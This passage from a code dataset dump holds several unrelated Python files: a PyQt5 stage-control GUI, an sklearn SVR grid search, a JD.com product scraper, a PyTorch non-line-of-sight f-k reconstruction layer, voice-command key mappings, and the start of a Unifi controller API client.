#self.Stage.getCurrPos()\n \n self.Main()\n \n def closeEvent(self, event):\n reply = QMessageBox.question(self, 'Message',\n \"Are you sure to quit?\", QMessageBox.Yes, QMessageBox.No)\n if reply == QMessageBox.Yes:\n self.Stage.closeStage()\n event.accept()\n else:\n event.ignore()\n \n \n \n def Main(self):\n self.timer = PyQt5.QtCore.QTimer()\n self.timer.timeout.connect(self.update)\n self.timer.start(50) \n self.Stage=StageCommunication()\n self.Stage.connectStage()\n self.Stage.setStageParams()\n #self.Stage.CalculateParameters_StageMove()\n #self.Stage.getCurrPos()\n \n def update(self): \n self.getCurrentPosition_X()\n \n \n \n def getCurrentPosition_X(self):\n 
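# Poll the XPS controller for the live position, round it to 4 decimal places,\n        # normalize -0.0 to 0.0, and push the result into the GUI position readout.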
res2=self.Stage.getCurrPos()\n #print(res2)\n res = self.Stage.currentPosition\n #res = self.XPS().GroupPositionCurrentGet(self.socketId, self.positioner, 1)\n res = float(res)\n PosX = round(res,4)\n if PosX == -0.0:\n PosX = 0.0\n else:\n PosX = PosX\n #print(PosX)\n self.Read_CurrentPostionX.setText(str(PosX))\n \n def MoveStageRel(self):\n move = self.input_SetRelPositionX.text()\n self.Stage.moveStageRel(move)\n \n def MoveStageAbs(self):\n move = self.input_SetAbsPositionX.text()\n self.Stage.moveStageAbs(move)\n \n \n \n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window=MyWindow()\n sys.exit(app.exec_())","sub_path":"src/modules/MovingStageY.py","file_name":"MovingStageY.py","file_ext":"py","file_size_in_byte":6541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386092816","text":"\n\n\"\"\"\nCode for running kernalized linear regression.\nIncludes options for kernelized ridge regression and support vector regression.\n\"\"\"\n\nimport csv\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn import svm\nfrom sklearn import datasets\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import normalize, scale, robust_scale\n\n\n\"Import data for training and test set:\"\n\n\ntraining_data = csv.reader(open(\"train.csv\", \"r\"), delimiter=\",\")\ntraining_data = list(training_data)\ntraining_data = training_data[1:]\ntraining_data = np.array(training_data).astype(float)\ntraining_data =np.random.permutation(training_data)\ntrainData_x = training_data[:,2:]\ntrainData_y = training_data[:,1]\n\ntest_data= csv.reader(open(\"test.csv\", \"r\"), delimiter=\",\")\ntest_data = (list(test_data))[1:]\ntest_data = np.array(test_data).astype(float)\ntestData_x = test_data[:,1:]\ntestDataID = test_data[:,0].astype(int)\n\n\n\"Some code for preprocessing data: see sklearn doc for info.\"\n\n# normalize(trainData_x, norm='l2', copy=False, return_norm=False)\n\n# scale(trainData_x, axis=1, with_mean=True, with_std=False, copy=False)\n\n#trainData_x_scaled=robust_scale(trainData_x, axis=0, with_centering=True, with_scaling=True, quantile_range=(25.0, 75.0), copy=True)\n\n\n\"Using kernel ridge as estimator:\"\n\n\n#KernRidge_RBF = KernelRidge(alpha=.5, kernel = 'rbf',gamma=0.05)\n#KernRidge_poly = KernelRidge(alpha=.5, kernel = 'polynomial',degree=4)\n\n\n\"... and for SVR:\"\n\n#svr_rbf = svm.SVR(kernel='rbf', C=1e3, gamma=0.08)\nsvr_poly = svm.SVR(kernel='poly', C=1, gamma=0.1)\n\n\n\"\"\"\nDefine paramaters for grid search to search through.\nYou can specify these parameters when you define the estimators, or if you want to search for optimal values, put them in the dictionaries below. 
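GridSearchCV then evaluates every parameter combination with cross-validation\nand keeps the best-scoring estimator.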
\n\"\"\"\n# parameters for kRR\nparam_KRR={\n 'degree': list(range(1,12)),\n 'coef0': list(range(0,2)),\n 'alpha': np.arange(0.3,5,0.1)\n}\n\n# parameters for SVR\nparam_SVR={\n 'degree': list(range(1,12)),\n 'coef0': list(range(0,2)),\n 'C': list(np.arange(0.5,5,0.5)),\n 'epsilon': list(np.arange(0.05,1,0.05))\n}\n\n\n\"Run grid search through hyperparameters:\"\n\n# enter estimator to use, dictionary of parameters, and 'cv' value (how many folds in cross validation).\nGS_results = GridSearchCV(svr_poly, param_grid=param_SVR,cv=10,scoring='mean_squared_error')\n\nGS_results.fit(trainData_x,trainData_y)\n\n\"Print out performance and parameters of best model\"\n\nprint ('Best parameters from grid search ',GS_results.best_params_)\n\n#(negative and root to give RMSE, b/c error given is negative mean squared error)\nprint ('lowest RMSE from grid search ',(-GS_results.best_score_)**0.5) \n\nprint ('best model from grid search ',GS_results.best_estimator_)\n\n\n","sub_path":"task1/Sensible_Version_GridSearchCV.py","file_name":"Sensible_Version_GridSearchCV.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"2099404","text":"#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&pvid=343929dad1e74534aba44084e5d29931\n#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&stock=1&page=3&s=57&click=0\n#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&stock=1&page=5&s=110&click=0\n#https://search.jd.com/Search?keyword=%E5%B7%A7%E5%85%8B%E5%8A%9B&enc=utf-8&qrst=1&rt=1&stop=1&vt=2&wq=%E5%B7%A7%E5%85%8B%E5%8A%9B&stock=1&page=7&s=163&click=0\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport csv\nimport os\n\ndef getHTMLText(url):\n try:\n headers = {\n 'User-Agent': 'User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'}\n r = requests.get(url, headers=headers,timeout=30)\n r.raise_for_status()\n r.encoding = r.apparent_encoding\n return r.text\n except:\n return \"\"\n\ndef parsePage(ilt, html):\n try:\n soup = BeautifulSoup(html, 'html.parser')\n for news in soup.select('.gl-item'):\n title = news.find('div', class_='p-name').text.strip()\n #title = news.select('.p-name.p-name-type-2 a')[0].text.strip()\n #print(title)\n price = news.select('.p-price')[0].text.strip()\n commit = news.select('.p-commit')[0].text.strip()\n urls = r'http://' + news.select('.p-img')[0].contents[1]['href']\n ilt.append([title, price, commit,urls])\n\n\n #print(ilt)\n\n\n except:\n print(\"\")\n\ndef printGoodsList(ilt):\n #tplt = \"{:^8}\\t{:^16}\\t{:^8}\"\n #print(tplt.format(\"序号\", \"名称\", \"价格\"), chr(12288))\n count = 0\n for g in ilt:\n count = count + 1\n #print(tplt.format(count, g[0], g[1], g[2]), chr(12288))\n print(\"%d、 \\n 名称:%s \\n 价格:%s\\n 评论:%s\\n 网址:%s\" % (count,g[0], g[1], g[2],g[3]))\n\ndef printComnent():\n url1 = 'https://sclub.jd.com/comment/productPageComments.action?' 
\\\n 'callback=fetchJSON_comment98vv76668&productId='\n url2= '&score=0&sortType=5&page='\n url3 = '&pageSize=10&isShadowSku=0&rid=0&fold=1'\n ID=input(\"请输入产品编号\")\n depth =input(\"请输入你要爬取的评论页码数:\")\n for i in range(int(depth)):\n url = url1+str(ID)+url2 + str(i) + url3\n #print(url)\n r = requests.get(url=url)\n html = r.content\n # print(\"当前抓取页面:\",url,\"状态:\",r)\n html = str(html, encoding=\"GBK\")\n content = re.findall(r'\"guid\".*?,\"content\":(.*?),', html)\n for j in range(len(content)):\n print(str(i * 10 + j + 1) + content[j])\n\ndef save(ilt):\n path = 'F:/数据/'\n if not os.path.exists(path):\n os.mkdir(path)\n with open( '京东商品数据.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow(['商品', '价格', '评论数', '链接'])\n writer.writerows(ilt)\n f.close()\n\n\n\ndef main():\n print('请输入爬取商品:')\n goods = input()\n print('请输入爬取页数:')\n depth = int(input())\n print(\"正在抓取...........................................\")\n start_url = 'https://search.jd.com/Search?keyword=' + goods\n infolist = []\n for i in range(depth):\n try:\n url = start_url + '&enc=utf-8&page=' + str(2 * i + 1)\n #print(url)\n html = getHTMLText(url)\n #print(html)\n parsePage(infolist, html)\n except:\n continue\n #print(infolist)\n printGoodsList(infolist)\n printComnent()\n save(infolist)\n\nmain()","sub_path":"JD/JDspider_to_excel.py","file_name":"JDspider_to_excel.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"466442418","text":"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\n################################################################\nclass lct_fk(nn.Module):\n \n def __init__(self, spatial=256, crop=512, \\\n bin_len=0.01, wall_size=2.0, align_corners=False):\n super(lct_fk, self).__init__()\n \n self.spatial_grid = spatial\n self.crop = crop\n assert 2 ** int(np.log2(crop)) == crop\n \n self.bin_len = bin_len\n self.wall_size = wall_size\n \n self.align_corners = align_corners\n \n self.parpareparam()\n \n def change_bin_len(self, bin_len):\n print('change bin_len from %f to %f' % (self.bin_len, bin_len))\n \n self.bin_len = bin_len\n self.bin_resolution = self.bin_len / self.c\n self.trange = self.crop * self.c * self.bin_resolution\n \n temprol_grid = self.crop\n sptial_grid = self.spatial_grid\n M = temprol_grid\n N = sptial_grid\n \n fkrange = ((N * self.trange) / (M * self.width * 4)) ** 2\n gridznew = fkrange * self.gridxy_change + self.gridz_change\n gridznew = np.sqrt(gridznew)\n self.gridznew = torch.from_numpy(gridznew)\n \n newsame_1x2Mx2Nx2Nx1 = self.gridznew.unsqueeze(0).unsqueeze(4)\n newx = self.gridx_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n newy = self.gridy_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n self.newcoord_1x2Mx2Nx2Nx3 = torch.cat([newx, newy, newsame_1x2Mx2Nx2Nx1], dim=4)\n \n dnum = self.newcoord_dx2Mx2Nx2Nx3_todev.shape[0]\n dev = self.newcoord_dx2Mx2Nx2Nx3_todev.device\n self.newcoord_dx2Mx2Nx2Nx3_todev = self.newcoord_1x2Mx2Nx2Nx3.to(dev).repeat(dnum, 1, 1, 1, 1)\n self.gridznew_todev = self.gridznew.to(dev)\n \n #####################################################\n def parpareparam(self,):\n \n self.c = 3e8\n self.width = self.wall_size / 2.0;\n self.bin_resolution = self.bin_len / self.c\n self.trange = self.crop * self.c * self.bin_resolution\n \n ########################################################3\n temprol_grid = self.crop\n sptial_grid = self.spatial_grid\n \n ############################################################\n 
gridz_M = np.arange(temprol_grid, dtype=np.float32)\n gridz_M = gridz_M / (temprol_grid - 1)\n gridz_1xMx1x1 = gridz_M.reshape(1, -1, 1, 1)\n self.gridz_1xMx1x1 = torch.from_numpy(gridz_1xMx1x1.astype(np.float32))\n \n #######################################################\n zdim = np.arange(2 * temprol_grid, dtype=np.float32)\n xdim = np.arange(2 * sptial_grid, dtype=np.float32)\n\n zdim = (zdim - temprol_grid) / temprol_grid\n xdim = (xdim - sptial_grid) / sptial_grid\n ydim = xdim\n \n [gridy_2Nx2Nx2M, gridx_2Nx2Nx2M, gridz_2Nx2Nx2M] = np.meshgrid(xdim, ydim, zdim)\n gridz_2Mx2Nx2N = np.transpose(gridz_2Nx2Nx2M, [2, 1, 0])\n gridy_2Mx2Nx2N = np.transpose(gridy_2Nx2Nx2M, [2, 1, 0])\n gridx_2Mx2Nx2N = np.transpose(gridx_2Nx2Nx2M, [2, 1, 0])\n \n '''\n print(gridz_2Mx2Nx2N[:, 0, 0])\n print(gridy_2Mx2Nx2N[0, :, 0])\n print(gridx_2Mx2Nx2N[0, 0, :])\n '''\n \n self.gridz_2Mx2Nx2N = torch.from_numpy(gridz_2Mx2Nx2N)\n self.gridy_2Mx2Nx2N = torch.from_numpy(gridy_2Mx2Nx2N)\n self.gridx_2Mx2Nx2N = torch.from_numpy(gridx_2Mx2Nx2N)\n \n self.gridxy_change = gridx_2Mx2Nx2N ** 2 + gridy_2Mx2Nx2N ** 2\n self.gridz_change = gridz_2Mx2Nx2N ** 2\n \n ###################################################\n M = temprol_grid\n N = sptial_grid\n \n fkrange = ((N * self.trange) / (M * self.width * 4)) ** 2\n gridznew = fkrange * self.gridxy_change + self.gridz_change\n gridznew = np.sqrt(gridznew)\n self.gridznew = torch.from_numpy(gridznew)\n \n newsame_1x2Mx2Nx2Nx1 = self.gridznew.unsqueeze(0).unsqueeze(4)\n newx = self.gridx_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n newy = self.gridy_2Mx2Nx2N.unsqueeze(0).unsqueeze(4)\n self.newcoord_1x2Mx2Nx2Nx3 = torch.cat([newx, newy, newsame_1x2Mx2Nx2Nx1], dim=4)\n \n ####################################################\n self.xdim = xdim\n self.zdim = zdim\n self.z0pos = np.where(zdim > 0)[0][0]\n print('zzeropos %d' % self.z0pos)\n \n def todev(self, dev, dnum):\n self.gridz_1xMx1x1_todev = self.gridz_1xMx1x1.to(dev)\n self.gridz_square_1xMx1x1 = self.gridz_1xMx1x1_todev ** 2\n self.datapad_Dx2Tx2Hx2W = torch.zeros((dnum, 2 * self.crop, 2 * self.spatial_grid, 2 * self.spatial_grid), dtype=torch.float32, device=dev)\n \n self.newcoord_dx2Mx2Nx2Nx3_todev = self.newcoord_1x2Mx2Nx2Nx3.to(dev).repeat(dnum, 1, 1, 1, 1)\n self.gridz_2Mx2Nx2N_todev = self.gridz_2Mx2Nx2N.to(dev)\n self.gridznew_todev = self.gridznew.to(dev)\n \n def roll_1(self, x_bxtxhxwx2, dim, n):\n if dim == 1:\n a = torch.cat((x_bxtxhxwx2[:, -n:], x_bxtxhxwx2[:, :-n]), dim=dim)\n if dim == 2:\n a = torch.cat((x_bxtxhxwx2[:, :, -n:], x_bxtxhxwx2[:, :, :-n]), dim=dim)\n if dim == 3:\n a = torch.cat((x_bxtxhxwx2[:, :, :, -n:], x_bxtxhxwx2[:, :, :, :-n]), dim=dim)\n return a\n \n def forward(self, feture_bxdxtxhxw, tbes, tens):\n \n ###############################################\n # 1 padd data with zero\n bnum, dnum, tnum, hnum, wnum = feture_bxdxtxhxw.shape\n for tbe, ten in zip(tbes, tens):\n assert tbe >= 0\n assert ten <= self.crop\n dev = feture_bxdxtxhxw.device\n \n featpad_bxdxtxhxw = []\n for i in range(bnum):\n featpad_1xdxt1xhxw = torch.zeros((1, dnum, tbes[i], hnum, wnum), dtype=torch.float32, device=dev)\n featpad_1xdxt2xhxw = torch.zeros((1, dnum, self.crop - tens[i], hnum, wnum), dtype=torch.float32, device=dev)\n featpad_1xdxtxhxw = torch.cat([featpad_1xdxt1xhxw, feture_bxdxtxhxw[i:i + 1], featpad_1xdxt2xhxw], dim=2)\n featpad_bxdxtxhxw.append(featpad_1xdxtxhxw)\n featpad_bxdxtxhxw = torch.cat(featpad_bxdxtxhxw, dim=0)\n \n # 2 params\n assert hnum == wnum\n assert hnum == self.spatial_grid\n 
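# Note: the measurement volume is zero-padded to twice the grid size in each\n        # dimension below, so the FFT-based filtering acts as a linear rather than\n        # circular convolution.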
sptial_grid = hnum\n temprol_grid = self.crop\n \n #################################################\n # step 0, pad data\n data_BDxTxHxW = featpad_bxdxtxhxw.view(bnum * dnum, self.crop, hnum, wnum)\n \n # c gridz_1xMx1x1 = self.gridz_1xMx1x1_todev\n # data_BDxTxHxW = data_BDxTxHxW * (gridz_1xMx1x1 ** 2)\n gridz_square_1xMx1x1 = self.gridz_square_1xMx1x1\n data_BDxTxHxW = data_BDxTxHxW * gridz_square_1xMx1x1\n \n # numerical issue\n data_BDxTxHxW = F.relu(data_BDxTxHxW, inplace=False)\n data_BDxTxHxW = torch.sqrt(data_BDxTxHxW)\n \n # datapad_BDx2Tx2Hx2W = torch.zeros((bnum * dnum, 2 * temprol_grid, 2 * sptial_grid, 2 * sptial_grid), dtype=torch.float32, device=dev)\n datapad_Dx2Tx2Hx2W = self.datapad_Dx2Tx2Hx2W\n # create new variable\n datapad_BDx2Tx2Hx2W = datapad_Dx2Tx2Hx2W.repeat(bnum, 1, 1, 1)\n\n datapad_BDx2Tx2Hx2W[:, :temprol_grid, :sptial_grid, :sptial_grid] = data_BDxTxHxW\n\n ###############################################\n # 1 fft\n # datapad_BDx2Tx2Hx2Wx2 = torch.stack([datapad_BDx2Tx2Hx2W, torch.zeros_like(datapad_BDx2Tx2Hx2W)], dim=4)\n datafre_BDX2Tx2Hx2Wx2 = torch.rfft(datapad_BDx2Tx2Hx2W, 3, onesided=False)\n \n # fftshift\n datafre_BDX2Tx2Hx2Wx2 = self.roll_1(datafre_BDX2Tx2Hx2Wx2, dim=1, n=temprol_grid)\n datafre_BDX2Tx2Hx2Wx2 = self.roll_1(datafre_BDX2Tx2Hx2Wx2, dim=2, n=sptial_grid)\n datafre_BDX2Tx2Hx2Wx2 = self.roll_1(datafre_BDX2Tx2Hx2Wx2, dim=3, n=sptial_grid)\n \n #########################################################\n # step2, ttrlt trick\n # simulate interpn\n # treat x and y as batch, sample z\n # shift\n \n if True:\n \n datafre_BDx2x2Hx2Wx2T = datafre_BDX2Tx2Hx2Wx2.permute(0, 4, 1, 2, 3)\n \n '''\n size = datafre_BDx2x2Hx2Wx2T.shape\n theta = torch.from_numpy(np.eye(3, 4, dtype=np.float32)).unsqueeze(0)\n gridstmp = F.affine_grid(theta, size, align_corners=self.align_corners)\n x = gridstmp[:, :, :, :, 0:1]\n y = gridstmp[:, :, :, :, 1:2]\n z = gridstmp[:, :, :, :, 2:3]\n '''\n \n newcoord_BDx2Mx2Nx2Nx3 = self.newcoord_dx2Mx2Nx2Nx3_todev.repeat(bnum, 1, 1, 1, 1)\n \n if True:\n datafrenew = F.grid_sample(datafre_BDx2x2Hx2Wx2T, newcoord_BDx2Mx2Nx2Nx3, \\\n mode='bilinear', padding_mode='zeros', \\\n align_corners=self.align_corners)\n else:\n datafrenew = F.grid_sample(datafre_BDx2x2Hx2Wx2T, newcoord_BDx2Mx2Nx2Nx3, \\\n mode='bilinear', padding_mode='zeros')\n \n tdata_BDx2Tx2Hx2Wx2 = datafrenew.permute(0, 2, 3, 4, 1)\n tdata_BDx2Tx2Hx2Wx2 = tdata_BDx2Tx2Hx2Wx2.contiguous()\n \n ############################################################\n # actually, pytorch sampling will lead a little different\n else:\n import scipy.interpolate as si\n zdim = self.zdim\n xdim = self.xdim\n ydim = xdim\n \n gridznew = self.gridznew.numpy()\n gridy_2Mx2Nx2N = self.gridy_2Mx2Nx2N.numpy()\n gridx_2Mx2Nx2N = self.gridx_2Mx2Nx2N.numpy()\n \n datafre_bdxtxhxwx2 = datafre_BDX2Tx2Hx2Wx2.detach().cpu().numpy()\n datafre_bdxtxhxw = datafre_bdxtxhxwx2[:, :, :, :, 0] + 1j * datafre_bdxtxhxwx2[:, :, :, :, 1]\n \n re = []\n for datafre in datafre_bdxtxhxw:\n tvol = si.interpn(points=(zdim, ydim, xdim), values=datafre, \\\n xi=np.stack([gridznew, gridy_2Mx2Nx2N, gridx_2Mx2Nx2N], axis=3), \\\n method='linear', bounds_error=False, fill_value=0)\n re.append(tvol)\n \n re_bdxtxhxw = np.stack(re)\n re_real_bdxtxhxw = np.real(re_bdxtxhxw)\n re_imag_bdxtxhxw = np.imag(re_bdxtxhxw)\n \n re_real_bdxtxhxw = torch.from_numpy(re_real_bdxtxhxw).to(dev)\n re_imag_bdxtxhxw = torch.from_numpy(re_imag_bdxtxhxw).to(dev)\n tdata_BDx2Tx2Hx2Wx2 = torch.stack([re_real_bdxtxhxw, re_imag_bdxtxhxw], 
dim=4)\n \n #############################################################\n samplez_1xMxNxNx1 = self.gridz_2Mx2Nx2N_todev.unsqueeze(0).unsqueeze(4)\n sampleznew = self.gridznew_todev.unsqueeze(0).unsqueeze(4)\n \n tdata_BDx2Tx2Hx2Wx2[:, :self.z0pos, :, :, :] = 0\n tdata_BDx2Tx2Hx2Wx2 = tdata_BDx2Tx2Hx2Wx2 * samplez_1xMxNxNx1.abs()\n \n tdata_BDx2Tx2Hx2Wx2 = tdata_BDx2Tx2Hx2Wx2 / (sampleznew + 1e-8)\n \n ###########################################\n # ifft\n tdata_BDx2Tx2Hx2Wx2 = self.roll_1(tdata_BDx2Tx2Hx2Wx2, dim=1, n=temprol_grid)\n tdata_BDx2Tx2Hx2Wx2 = self.roll_1(tdata_BDx2Tx2Hx2Wx2, dim=2, n=sptial_grid)\n tdata_BDx2Tx2Hx2Wx2 = self.roll_1(tdata_BDx2Tx2Hx2Wx2, dim=3, n=sptial_grid)\n \n data = torch.ifft(tdata_BDx2Tx2Hx2Wx2, 3)\n data = data[:, :temprol_grid, :sptial_grid, :sptial_grid]\n data = data[:, :, :, :, 0] ** 2 + data[:, :, :, :, 1] ** 2;\n \n ##########################################################################3\n volumn_BDxTxHxW = data.view(bnum * dnum, self.crop, hnum, wnum)\n \n volumn_BxDxTxHxW = volumn_BDxTxHxW.view(bnum, dnum, self.crop, hnum, wnum)\n \n return volumn_BxDxTxHxW\n\n\nif __name__ == '__main__':\n \n import os\n import cv2\n import numpy as np\n \n '''\n fd = '/u6/a/wenzheng/remote2/code-nlos-git/OccludedSceneRep-2/code/pytorch-wz/dataloader_light22_bbox';\n ims = []\n tbe = -1\n for i in range(512):\n name = '%s/2-%d.png' % (fd, i)\n if not os.path.isfile(name):\n ims.append(np.zeros((256, 256), dtype=np.uint8))\n continue\n \n if tbe < 0:\n tbe = i\n \n im = cv2.imread(name)\n imgt = im[:256, :256, :]\n im = im[:256, -256:, :]\n imgray = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)\n ims.append(imgray)\n \n rect_data_txhxw = np.array(ims, dtype=np.float32) / 255.0\n rect_data_hxwxt = np.transpose(rect_data_txhxw, [1, 2, 0])\n '''\n \n from scipy.io import loadmat\n \n data = loadmat('/home/wenzheng/largestore/nlos-phasor/nlos-fk-master/statue.mat')\n rect_data_hxwxt = data['data']\n \n sptial_grid = 512\n crop = 512\n bin_len = 32e-12 * 3e8 # 0.01\n \n K = 2\n temds = False\n for k in range(K):\n rect_data_hxwxt = rect_data_hxwxt[::2, :, :] + rect_data_hxwxt[1::2, :, :]\n rect_data_hxwxt = rect_data_hxwxt[:, ::2, :] + rect_data_hxwxt[:, 1::2, :]\n sptial_grid = sptial_grid // 2\n \n if temds:\n rect_data_hxwxt = rect_data_hxwxt[:, :, ::2] + rect_data_hxwxt[:, :, 1::2]\n crop = crop // 2\n bin_len = bin_len * 2 \n \n rect_data_dxhxwxt = np.expand_dims(rect_data_hxwxt, axis=0)\n rect_data_bxdxhxwxt = np.expand_dims(rect_data_dxhxwxt, axis=0)\n \n bnum = 3\n dnum = 1\n rect_data_bxdxhxwxt = np.tile(rect_data_bxdxhxwxt, [bnum, dnum, 1, 1, 1])\n rect_data_bxdxhxwxt = torch.from_numpy(rect_data_bxdxhxwxt).cuda()\n \n dev = 'cuda'\n \n #####################################################################\n lctlayer = lct_fk(spatial=sptial_grid, crop=crop, bin_len=bin_len)\n lctlayer.todev(dev, dnum)\n \n tbe = 0 // (2 ** K)\n if temds:\n tlen = 512 // (2 ** K)\n else:\n tlen = 512\n \n for i in range(10):\n print(i)\n re = lctlayer(rect_data_bxdxhxwxt[:, :, :, :, tbe:tbe + tlen].permute(0, 1, 4, 2, 3), \\\n [tbe, tbe, tbe], [tbe + tlen, tbe + tlen, tbe + tlen])\n \n volumn_MxNxN = re.detach().cpu().numpy()[0, -1]\n zdim = volumn_MxNxN.shape[0] * 100 // 128\n volumn_MxNxN = volumn_MxNxN[:zdim]\n print('volumn min, %f' % volumn_MxNxN.min())\n print('volumn max, %f' % volumn_MxNxN.max())\n \n volumn_MxNxN[volumn_MxNxN < 0] = 0\n front_view = np.max(volumn_MxNxN, axis=0)\n cv2.imshow(\"re\", front_view / np.max(front_view))\n # cv2.imshow(\"gt\", imgt)\n 
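# front_view above is a max-intensity projection of the reconstructed volume\n    # along the depth axis, a common way to preview an NLOS reconstruction;\n    # e.g. np.max(volumn_MxNxN, axis=2) would give a side view instead.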
cv2.waitKey()\n \n volumn_ZxYxX = volumn_MxNxN\n volumn_ZxYxX = volumn_ZxYxX / np.max(volumn_ZxYxX)\n for i, frame in enumerate(volumn_ZxYxX):\n print(i)\n cv2.imshow(\"re1\", frame)\n cv2.imshow(\"re2\", frame / np.max(frame))\n cv2.waitKey(0)\n","sub_path":"DL_inference/utils_pytorch/tffk.py","file_name":"tffk.py","file_ext":"py","file_size_in_byte":15142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"247561334","text":"from Actions import Key, Text\nfrom protocol import Integer, Dictation, RuleType\nfrom requirements.Emacs import NotEmacs\nfrom requirements.Terminal import NotTerminal\nfrom rules.emacs.Cmd import CharCmd\nfrom rules.ContextualRule import makeContextualRule\n\n_mapping = {\n \"copy\" : Key(\"c-c\"),\n \"cut\" : Key(\"c-x\"),\n \"paste\" : Key(\"c-v\"),\n \"term paste\" : Key(\"s-insert\"),\n \"select all\" : Key(\"c-a\"),\n \"select per\" : Key(\"cs-left\"),\n \"select pro\" : Key(\"cs-right\"),\n \"select home\" : Key(\"s-home\"),\n \"select edge\" : Key(\"s-end\"),\n \"undo\" : Key(\"c-z\"),\n \"redo\" : Key(\"c-y\"),\n \"next form\" : Key(\"tab\"),\n \"previous form\" : Key(\"s-tab\"),\n \"axe\" : Key(\"escape\"),\n \"find\" : Key(\"c-f\"),\n \"find it next []\" : Key(\"F3:%(n)d\"),\n \"find it previous []\" : Key(\"s-F3:%(n)d\"),\n \"leaf []\" : Key(\"pgdown:%(n)d\"),\n \"feel []\" : Key(\"pgup:%(n)d\"),\n \"home\" : Key(\"home\"),\n \"edge\" : Key(\"end\"),\n \"left []\" : Key(\"left:%(n)d\"),\n \"right []\" : Key(\"right:%(n)d\"),\n \"hike []\" : Key(\"up:%(n)d\"),\n \"slide []\" : Key(\"down:%(n)d\"),\n \"bonk []\" : Key(\"delete:%(n)d\"),\n \"knock []\" : Key(\"backspace:%(n)d\"),\n \"slap []\" : Key(\"enter:%(n)d\"),\n \"num \" : Text(\"%(big)d\"),\n \"per []\" : Key(\"c-left:%(n)d\"),\n \"pro []\" : Key(\"c-right:%(n)d\"),\n \"chip []\" : Key(\"c-backspace:%(n)d\"),\n \"pitch []\" : Key(\"c-delete:%(n)d\"),\n \"top side\" : Key(\"c-home\"),\n \"bottom\" : Key(\"c-end\"),\n \"save file\" : Key(\"c-s\"),\n \"open file\" : Key(\"c-o\"),\n \"new file\" : Key(\"c-n\"),\n\n # Also in the emacs rules, but since emacs rules are mutually exclusive with these\n # both definition should never be active at the same time.\n \"view \" : CharCmd(\"(md-select-window-with-glyph %s)\"),\n}\n\n_extras = [\n Integer(\"n\", 3, 100),\n Integer(\"i\", 3, 8),\n Integer(\"big\", 0, 2**14),\n]\n\n_defaults = {\n \"search_terms\" : \"\",\n \"n\": 1,\n \"i\": 1,\n}\n\nCUARule = makeContextualRule(\"CUA\", _mapping, _extras, _defaults)\nCUARule.context.addRequirement(NotEmacs)\nCUARule.context.addRequirement(NotTerminal)\n","sub_path":"rules/CUA.py","file_name":"CUA.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"250807756","text":"from requests import Session\nimport json\nimport re\nfrom typing import Pattern, Dict, Union\n\n\nclass LoggedInException(Exception):\n\n def __init__(self, *args, **kwargs):\n super(LoggedInException, self).__init__(*args, **kwargs)\n\n\nclass API(object):\n \"\"\"\n Unifi API for the Unifi Controller.\n\n \"\"\"\n _login_data = {}\n _current_status_code = None\n\n def __init__(self, username: str=\"ubnt\", password: str=\"ubnt\", site: str=\"default\", baseurl: str=\"https://unifi:8443\", verify_ssl: bool=True):\n \"\"\"\n Initiates tha api with default settings if none other are set.\n\n :param username: username for the controller user\n :param password: password for the controller user\n :param 
site: which site to connect to (Not the name you've given the site, but the url-defined name)\n :param baseurl: where the controller is located\n :param verify_ssl: Check if certificate is valid or not, throws warning if set to False\n \"\"\"\n self._login_data['username'] = username\n self._login_data['password'] = password\n self._site = site\n self._verify_ssl = verify_ssl\n self._baseurl = baseurl\n self._session = Session()\n\n def __enter__(self):\n \"\"\"\n Contextmanager entry handle.\n\n :return: instance object of class\n \"\"\"\n self.login()\n return self\n\n def __exit__(self, *args):\n \"\"\"\n Contextmanager exit handle.\n\n :return: None\n \"\"\"\n self.logout()\n\n def login(self):\n \"\"\"\n Log the user in.\n\n :return: None\n \"\"\"\n self._current_status_code = self._session.post(\"{}/api/login\".format(self._baseurl), data=json.dumps(self._login_data), verify=self._verify_ssl).status_code\n if self._current_status_code == 400:\n raise LoggedInException(\"Failed to log in to api with provided credentials\")\n\n def logout(self):\n \"\"\"\n Log the user out.\n\n :return: None\n \"\"\"\n self._session.get(\"{}/logout\".format(self._baseurl))\n self._session.close()\n\n def list_clients(self, filters: Dict[str, Union[str, Pattern]]=None, order_by: str=None) -> list:\n \"\"\"\n List all available clients from the api.\n\n :param filters: dict of k/v pairs; string is compiled to regex\n :param order_by: order by a key; defaults to '_id'\n :return: A list of clients on the format of a dict\n \"\"\"\n\n r = self._session.get(\"{}/api/s/{}/stat/sta\".format(self._baseurl, self._site, verify=self._verify_ssl), data=\"json={}\")\n self._current_status_code = r.status_code\n\n if self._current_status_code == 401:\n raise LoggedInException(\"Invalid login, or 